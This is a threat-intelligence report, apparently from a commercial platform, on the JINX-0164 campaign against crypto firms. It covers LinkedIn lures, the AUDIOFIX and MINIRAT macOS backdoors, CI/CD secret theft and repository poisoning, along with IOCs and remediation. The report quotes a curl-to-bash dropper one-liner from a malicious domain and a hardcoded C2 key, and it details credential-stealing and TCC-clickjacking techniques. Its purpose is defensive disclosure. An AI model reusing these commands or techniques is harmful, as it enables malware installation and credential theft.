Threat reportAPTTL-2026-0607
JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn Social Engineering and Internal CI/CD Hijacking (Wiz CIRT)
JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn (TL-2026-0607), also tracked as JINX-0164, is a critical-severity advanced persistent threat campaign, first published 2026-05-27. It is attributed to JINX-0164 (North Korea) with medium confidence, affects Apple macOS, maps to 41 MITRE ATT&CK techniques (T1005, T1020, T1027), and is covered by 9 detection rules and 68 indicators of compromise.
- Severity
- CRITICALAssessed severity
- CVEs
- 0None referenced
- Techniques
- 41MITRE ATT&CK
- Actors
- 1JINX-0164
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 68Indicators of compromise
Key facts for TL-2026-0607
- Threat ID
- TL-2026-0607
- Also known as
- JINX-0164, Wiz JINX-0164, AUDIOFIX campaign, Velora npm supply-chain compromise
- Severity
- CRITICAL
- Status
- ACTIVE
- Category
- APT
- First published
- Last reviewed
- Attribution
- JINX-0164
- Attribution confidence
- MEDIUM
- Nation-state nexus
- North Korea
- Motivation
- FINANCIAL
- Target sectors
- cryptocurrency, blockchain, financial-services, fintech, software-development, defi
- Target regions
- Global, North America, Europe, Asia
- Detection rules
- 9
- Indicators of compromise
- 68
Malware and tooling in JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn
Malware and tooling: AUDIOFIX, miniRAT, Custom Python AES-256-CBC + Dropbox API, nord-stream
How JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn works
Wiz CIRT and Wiz Research disclosed JINX-0164 on 2026-05-27 — a financially motivated threat cluster active since mid-2025 that targets cryptocurrency organizations with LinkedIn recruiter lures, the custom macOS Python RAT AUDIOFIX (delivered via a ClickFix one-liner from fake teleconferencing/driver domains), and automated GitHub Actions secret theft via nord-stream. The actor laterally moves by injecting AUDIOFIX into internal Git repositories using developer impersonation, turning the victim's CI/CD pipeline into a propagation vector. JINX-0164 has trojanized the @velora-dex/sdk npm package (v4.9.1) and targets 51 crypto wallet extensions plus 2 desktop wallet apps; TTPs overlap with DPRK UNC1069/Sapphire Sleet but Wiz tracks the cluster as distinct.
## Overview
JINX-0164 is a financially motivated threat cluster, first publicly named by Wiz CIRT and Wiz Research on 2026-05-27, that has targeted the cryptocurrency industry since at least mid-2025. The actor pairs LinkedIn-driven social engineering with custom macOS malware (AUDIOFIX, MINIRAT), automated CI/CD secret theft via nord-stream, and internal source-repository poisoning to propagate malware across developer infrastructure. While JINX-0164's TTPs overlap with DPRK clusters UNC1069 and Sapphire Sleet (per Microsoft's April 2026 reporting), Wiz attributes the activity to a distinct cluster with no infrastructure overlap to publicly tracked North Korean groups — and assesses the motivation as financial rather than state-directed espionage. The actor has demonstrated supply-chain capability by trojanizing version 4.9.1 of the npm package @velora-dex/sdk on 2026-04-07 (a popular DEX aggregation SDK), and has stood up an extensive lookalike-domain infrastructure spoofing Microsoft Teams, Slack, Aircall, Dialpad, BitGet, and macOS driver-update portals.
## Initial Access — LinkedIn Recruiter Lure ("Contagious Interview" variant)
JINX-0164 operators run a recruitment-themed pretext consistent with the broader "Contagious Interview" pattern attributed to DPRK clusters. Initial contact is via LinkedIn, using either compromised legitimate accounts belonging to professionals in the crypto industry or fully fabricated profiles with established connections and relevant employment history (these synthetic profiles are deleted shortly after compromise and never re-enabled). The actor proposes a virtual meeting on Microsoft Teams, Slack, Aircall, or Dialpad and sends a calendar invite pointing at a lookalike domain (e.g., `teams.cam`, `teamicrosoft.com`, `bitget-meeting.com`, `slktest.live`). Inside the spoofed meeting flow, the victim is told there is a technical error and routed to a fake troubleshooting page (e.g., `learn.bitget-meeting[.]com/.../teams-audio-issue-mac`) instructing them to execute a one-liner such as:
`/bin/bash -c "$(curl -fsSL https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh)"`
This "ClickFix"-style social-engineering primitive bypasses macOS Gatekeeper by relying on the victim to invoke `bash` directly against a remote URL.
## Stage 1 — Architecture-Aware Dropper Script
The remote bash script profiles the host via `uname` / `uname -m`, branches between Apple Silicon (arm64) and Intel (x86_64), and pulls the matching binary from a sibling URL on the same delivery domain (e.g., `https://apple.driver-store.com/mac/arm/driver/coreaudiod` vs `.../mac/intel/driver/coreaudiod`). The payload is saved to `~/Library/Application Support/Google/ChromeUpdater`, marked executable with `chmod +x`, and launched as `chrome.job` (or `coreaudio.job` in other variants) via `launchctl submit -l chrome.job -- "$DRIVER_PATH" --update`. Wiz identified four distinct dropper-script variants across three delivery domains; all four are macOS-only and exit silently on Linux/Windows. Known dropper hashes:
- `9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a` — fake audio-fix (apple.driver-store.com) - `402625ec79e3573a80b6de9b33fc1e503e3c7803603cd958ddd515fb0549007c` — fake audio-fix (apple.driver-update.io) - `b6cab0b3aa8e56e2427f486c74588d598ae58bb0cbc0eda6939fe171cb0aed17` — fake audio-fix (driver-updater.net) - `d4e863f9818bfb2f1dd932df6441dff204e6142c3bdb55b298cb08dc7b6a0c62` — fake Chrome-update (apple.driver-store.com) - `c6ef82d2864dfd26f117a1ef5602679153423f2742970a7949cec72722f0a01e` and `2a10ffe0367bb1b26ba2c3bc600892c21074725c0b8c9dc9161e6ceb33915460` — supply-chain delivery (89.36.224.5)
## Stage 2 — AUDIOFIX: Python 3.12 Infostealer + Backdoor
AUDIOFIX is a PyInstaller-compiled Python 3.12 binary (ARM64 + x86_64 variants) that masquerades on disk as the macOS system audio driver `coreaudiod`. On first launch it displays a native NSAlert dialog ("the fix has been completed") to placate the user, then establishes persistence by dropping a LaunchAgent under `~/Library/LaunchAgents/` with the `RunAtLoad` and `KeepAlive` flags set to true. Observed plist labels masquerade as legitimate communication apps: `com.microsoft.teams.coreaudiod.plist`, `io.aircall.workspace.helper.plist`, `com.electron.dialpad.helper.plist`.
### Credential Harvesting (broad-spectrum, fully automated)
AUDIOFIX launches dedicated routines that scrape:
- **macOS Keychain** contents (login.keychain-db) and shell-history files (`.zsh_history`, `.bash_history`). - **Browsers** — credentials, cookies, and session data across 10 browsers (Chrome, Edge, Firefox, Brave, Opera, Arc, Vivaldi, etc.). - **Cryptocurrency wallets** — 51 wallet browser extensions targeted (MetaMask, Phantom, Coinbase Wallet, Binance Chain Wallet, Trust, Rabby, etc.) plus 2 desktop wallet applications. The configuration enumerates extension IDs and pulls IndexedDB/LevelDB state. - **Developer credentials** — SSH keys (`~/.ssh/`), AWS credentials (`~/.aws/credentials`, `~/.aws/config`), GCP application-default credentials, Azure CLI tokens, Cloudflare API tokens, Kubernetes kubeconfigs, GitHub PATs (`~/.config/gh/`, `~/.netrc`, environment files), and miscellaneous dotfile-stored secrets. - **Communication apps** — Discord tokens (LevelDB), Slack cookies and local storage, Telegram `tdata` directory, local Signal database files. - **Clipboard monitor** — a background thread continuously logs clipboard contents with timestamps (specifically targeting copy-pasted wallet addresses, seed phrases, and passwords).
Collected data is POSTed to `/file/upload` on the C2 domain.
### Command and Control
AUDIOFIX has two known C2 channels:
1. **HTTPS variant (primary)** — AES-256-CBC encryption with three fallback C2 servers stored as encrypted blobs inside the binary. Hardcoded AES key `v59l2uwlow9s1ebuscgfg9k9r4voxkbs` (same key shared with MINIRAT). Two polling modes: normal (5-second interval) and stealth (randomized 10–30 minute intervals). C2 commands include arbitrary Python `exec()`, arbitrary shell commands, file download/upload, restart specific collection routines, and self-destruct. Hardcoded C2 domains: `datahub.ink` (primary, observed resolving to 208.115.220.17 and 185.175.59.85), `cloud-sync.online` (backup), `byte-io.us` (backup). 2. **Dropbox variant (earlier)** — uses hardcoded Dropbox API credentials and the `files_download` / `files_upload` / `files_list_folder` endpoints to fetch tasking and exfiltrate data. Limited backdoor functionality versus the HTTPS variant.
### Social-Engineering Auxiliary Modules
- **Password phishing**: a fake "System Update" NSAlert (built with AppKit/PyObjC) prompts for the user password. The malware validates the entered password using `sudo -k -S pwd`; on success, the cleartext is XOR-encoded (single-byte key `0xAB`) and written to `~/.zsh_cache` before exfiltration. The presence of `~/.zsh_cache` is a high-fidelity host indicator. - **TCC clickjacking**: AUDIOFIX overlays a transparent fake "Network latency detected" dialog on top of the legitimate macOS TCC permission prompt (triggered via `osascript -e` against Finder Automation). When the victim clicks OK to dismiss the fake warning, they actually click "Allow" on the hidden TCC dialog beneath, granting Full Disk Access. Curiously, this access is never used by the main codebase — its purpose may be to demonstrate the technique or set up follow-on tooling.
### Anti-Analysis
AUDIOFIX checks for debuggers (sysctl `kern.proc.pid` `P_TRACED` flag), virtualization (CPU brand-string and manufacturer-name inspection), and validates Apple code-signing on the host environment. If any check fails, the malware exits silently. A self-destruct command unloads the LaunchAgent, wipes persistence files, clears logs, purges server-side data, and deletes the binary.
## Stage 2b — MINIRAT (Supply-Chain Variant)
MINIRAT is a lightweight Go backdoor (Go module path `alibaba.xyz/minirat`, hence the name) used in the npm supply-chain branch of the operation. SHA-256 of the primary ARM64 sample: `0a8ab3d16b12d3a453ee5a3208fe04744ad54514ef8ea27bb8fe32679efad270`. MINIRAT reuses the same AES key (`v59l2uwlow9s1ebuscgfg9k9r4voxkbs`) and three C2 domains as AUDIOFIX, confirming a shared toolchain. On launch it collects hostname and username, queries `https://api.ipify.org` for the public IP, uses the Mac's hardware UUID as the persistent agent identifier, and sets persistence via a plist at `~/Library/LaunchAgents/` with label `com.apple.Terminal.profiler` (RunAtLoad + KeepAlive). Backdoor commands: shell execution, file upload, file download, tar+upload of arbitrary directories. No automated credential harvesting (unlike AUDIOFIX).
## Stage 3 — Cloud and Version-Control Credential Abuse
After harvesting GitHub Personal Access Tokens from the developer endpoint, JINX-0164 pivots into the victim organization's CI/CD pipelines. The operators run the open-source tool **nord-stream** to automatically enumerate GitHub Actions secrets and Azure DevOps pipeline variables, then exfiltrate them by injecting throwaway workflows. nord-stream's default artifacts are easily fingerprinted and constitute one of the highest-fidelity hunt opportunities for this activity:
- Branch: `dev_remote_ea5Eu/test/v1` - Committer name: `nord-stream` - Committer email: `nord-stream@localhost.com` - Commit messages: "Test deployment" and "Remove test deployment" - User agent: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36` - GitHub workflow filename: `init_ZkITM.yaml` - Azure DevOps pipeline name: `Build_pipeline_58675`, repository: `TestDev_ea5Eu`, task: `Task fWQf8`
Cloud credentials harvested from the endpoint (AWS, GCP, Azure, Cloudflare) were observed in some sign-in attempts but the actor showed no interest in cloud enumeration or pivoting — consistent with the financial-monetization focus.
## Stage 4 — Internal Source-Repository Poisoning (Lateral Movement)
The defining innovation of JINX-0164's intrusions is the use of the victim organization's own Git repositories as a worm-like propagation vector. Using the harvested GitHub credentials, the actor commits AUDIOFIX directly into internal repositories so that other developers who pull and build are infected. Three deceptive Git tactics are used:
1. **Developer impersonation** — `committer.name` and `committer.email` are forged to impersonate other developers. Because the commit is unsigned (or signed with the attacker's key under another developer's name), it carries an "Unverified" badge on GitHub but appears authored by a trusted colleague. 2. **Direct-to-main commits** — in repositories without branch protection, the malicious commit is pushed straight to `main`. 3. **Branch hijacking** — in protected-main scenarios, the payload is inserted into an existing feature branch and waits for the legitimate developer to merge it.
The infection then propagates whenever other engineers clone, pull, or build. Wiz's customer detected the spread using GitHub Vigilant Mode (which flags the unverified badge alongside a historical GPG-key/author-name mismatch) and confirmed via GitHub audit logs that the `git push` originated from the initially compromised endpoint.
## Stage 5 — Cryptocurrency Theft and Supply-Chain Operations …
MITRE ATT&CK techniques used in TL-2026-0607
Collection
T1005 Data from Local System; T1115 Clipboard Data; T1560 Archive Collected Data
Exfiltration
T1020 Automated Exfiltration; T1041 Exfiltration Over C2 Channel; T1567 Exfiltration Over Web Service
Defense Evasion
T1027 Obfuscated Files or Information; T1036 Masquerading; T1070 Indicator Removal; T1497 Virtualization/Sandbox Evasion; T1622 Debugger Evasion
Credential Access
T1056 Input Capture; T1528 Steal Application Access Token; T1539 Steal Web Session Cookie; T1552 Unsecured Credentials; T1555 Credentials from Password Stores
Execution
T1059 Command and Scripting Interpreter; T1204 User Execution
Command and Control
T1071 Application Layer Protocol; T1102 Web Service; T1105 Ingress Tool Transfer; T1573 Encrypted Channel
Lateral Movement
T1080 Taint Shared Content; T1550 Use Alternate Authentication Material
Discovery
T1082 System Information Discovery; T1083 File and Directory Discovery; T1526 Cloud Service Discovery
command-and-control
Initial Access
T1195 Supply Chain Compromise; T1199 Trusted Relationship; T1566 Phishing
Persistence
T1543 Create or Modify System Process
Privilege Escalation
T1548 Abuse Elevation Control Mechanism
Resource Development
T1583 Acquire Infrastructure; T1585 Establish Accounts; T1586 Compromise Accounts; T1587 Develop Capabilities; T1588 Obtain Capabilities
Reconnaissance
T1589 Gather Victim Identity Information; T1593 Search Open Websites/Domains
Impact
Affected products and versions in JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn
- Apple — macOS
Vulnerable versions: macOS 13 Ventura; macOS 14 Sonoma; macOS 15 Sequoia - Velora (npm) — @velora-dex/sdk
Vulnerable versions: 4.9.1
Fixed in: any non-4.9.1 release post-2026-04-07 - GitHub — GitHub Actions (CI/CD secrets)
Vulnerable versions: all - Microsoft — Azure DevOps Pipelines (variables/secrets)
Vulnerable versions: all - Wallet developers — 51 cryptocurrency browser-extension wallets (MetaMask, Phantom, Coinbase Wallet, Binance Chain, Rabby, Trust, etc.)
Vulnerable versions: all browser-extension installs on infected macOS hosts - Wallet developers — 2 desktop cryptocurrency wallet applications
Vulnerable versions: all on infected macOS hosts
Remediation for JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn
Patches
- No vendor patch — this is a social-engineering + supply-chain campaign, not a software vulnerability
- Upgrade @velora-dex/sdk away from compromised v4.9.1 to a known-clean version (per Velora maintainers and StepSecurity advisory)
Immediate actions
- Block C2 domains datahub.ink, cloud-sync.online, byte-io.us at DNS / egress proxy / EDR
- Block resolved C2 IPs 208.115.220.17, 185.175.59.85, 89.36.224.5 at perimeter firewall
- Hunt macOS endpoints for ~/.zsh_cache (XOR-0xAB stolen password), /audio.lock, /helper.log, /clip, /tokens.txt, and AUDIOFIX LaunchAgent plists (com.microsoft.teams.coreaudiod.plist, io.aircall.workspace.helper.plist, com.electron.dialpad.helper.plist)
- Hunt GitHub audit logs and CI/CD logs for nord-stream fingerprints: branch dev_remote_ea5Eu/test/v1, committer nord-stream@localhost.com, workflow init_ZkITM.yaml, pipeline Build_pipeline_58675, commit messages 'Test deployment' / 'Remove test deployment'
- Audit @velora-dex/sdk usage — ensure no developer machine has installed v4.9.1; pin to a clean known-good version
- Force-rotate all GitHub PATs, AWS/GCP/Azure/Cloudflare keys, and SSH keys on macOS developer endpoints with any indicator of compromise
- Block sign-ins from Astrill VPN, Mullvad VPN, and ExpressVPN exit-node IP ranges against source-control (GitHub) and CI/CD platforms for developer accounts
Workarounds
- Block execution of unsigned binaries on macOS via Gatekeeper hardening (spctl --master-enable) and Endpoint Security framework allow-listing
- Disable LaunchAgent creation in user space by non-admin tooling via MDM configuration profile
- Block outbound HTTPS to commercial VPN provider ASNs (Astrill/Mullvad/ExpressVPN) from corporate networks; require sanctioned VPN only
Longer-term hardening
- Deploy macOS EDR (Jamf Protect, SentinelOne, CrowdStrike Falcon for Mac) with detection for LaunchAgent persistence in ~/Library/LaunchAgents, osascript-driven TCC prompts, and clipboard-monitoring background threads
- Enforce branch protection + required signed commits on every internal repository; enable GitHub Vigilant Mode org-wide to surface unverified commits
- Require hardware-bound SSH keys (Secure Enclave) and FIDO2 MFA for git push to internal repositories
- Move from long-lived GitHub PATs and cloud access keys to short-lived OIDC tokens and IAM Identity Center / Workload Identity Federation
- Implement a CI/CD secret scoping policy: GitHub Actions secrets should be environment-scoped with required reviewers, not repository-wide
- Run periodic GitHub audit-log review for committer/author email mismatch and unverified commits to protected branches
- Developer-targeted security training: recruiter-lure recognition, ban on executing 'curl | bash' instructions from third-party support pages
Weaknesses (CWE) in JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn
Timeline of JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn
- JINX-0164 cluster assessed by Wiz as active since at least mid-2025; recruiter-themed LinkedIn lure pattern established.
- Reddit r/CyberSecurityAdvice post documents victim approached on LinkedIn by purported BitGet recruiter; ClickFix lure via learn.bitget-meeting[.]com pushes AUDIOFIX via curl|bash one-liner.
- JINX-0164 publishes trojanized @velora-dex/sdk v4.9.1 to npm; malicious dist/index.js base64-decodes to nohup bash curl from 89.36.224[.]5 delivering MINIRAT. GitHub source repo not modified — attacker held only npm credentials.
- StepSecurity publishes initial advisory on the @velora-dex/sdk npm compromise documenting launchctl persistence and macOS backdoor delivery.
- iru.com publishes technical analysis of MINIRAT Go backdoor (alibaba.xyz/minirat module path).
- Microsoft Threat Intelligence publishes Sapphire Sleet macOS intrusion analysis — later used by Wiz as TTP comparison baseline; no infrastructure overlap with JINX-0164 identified.
- Landmark early-2026 intrusion (Wiz CIRT case study) — two-week attack chain from LinkedIn outreach to internal repo poisoning; AUDIOFIX HTTPS variant deployed via apple.driver-store[.]com; nord-stream used to exfiltrate GitHub Actions secrets.
- Modified MINIRAT sample uploaded to VirusTotal, indicating continued operational use beyond the npm supply-chain campaign.
- Threadlinqs Intelligence Platform ingests Wiz JINX-0164 disclosure as TL-2026-0607; cross-referenced against prior DPRK-adjacent threats TL-2026-0567 (Cython InvisibleFerret), TL-2026-0464 (Lazarus git hooks), TL-2026-0579 (Lazarus RemotePE).
- Wiz CIRT and Wiz Research publish 'Commit to Compromise' blog naming JINX-0164, attributing it as financially motivated, releasing IOCs (8 malware hashes, 30+ domains, 8 IP addresses), and assessing TTP overlap with UNC1069/Sapphire Sleet without confirming attribution.
- As of 2026-05-29, JINX-0164 remains an active, financially-motivated crypto-targeting cluster — Wiz disclosed it only days earlier (2026-05-27), corroborated by THN/Infosecurity, with no takedown, sinkhole, or arrest reported and AUDIOFIX/MINIRAT C2 still live. Only the @velora-dex/sdk npm vector was remediated; the actor, tooling, and recruiter-lure campaign continue.
Sources cited for JINX-0164 — Crypto-Targeting macOS AUDIOFIX RAT via LinkedIn
- Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure
- Velora-DEX SDK compromised on npm — malicious version drops macOS backdoor via launchctl persistence
- MINIRAT analysis
- GitHub Attacks: PAT Control Plane (Wiz)
- Dissecting Sapphire Sleet's macOS Intrusion — from Lure to Compromise (Microsoft)
- GitHub Vigilant Mode — Displaying verification statuses for all of your commits
- Reddit r/CyberSecurityAdvice — BitGet video-call scam attempt (public victim report)
- nord-stream — automated GitHub Actions / Azure DevOps secrets exfiltration (GitHub project)
- MITRE ATT&CK T1566.003 — Spearphishing via Service
- MITRE ATT&CK T1195.002 — Compromise Software Supply Chain
Detection coverage for TL-2026-0607
As of 2026-05-27, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0607 across Splunk SPL, Microsoft KQL and Sigma, covering 68 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.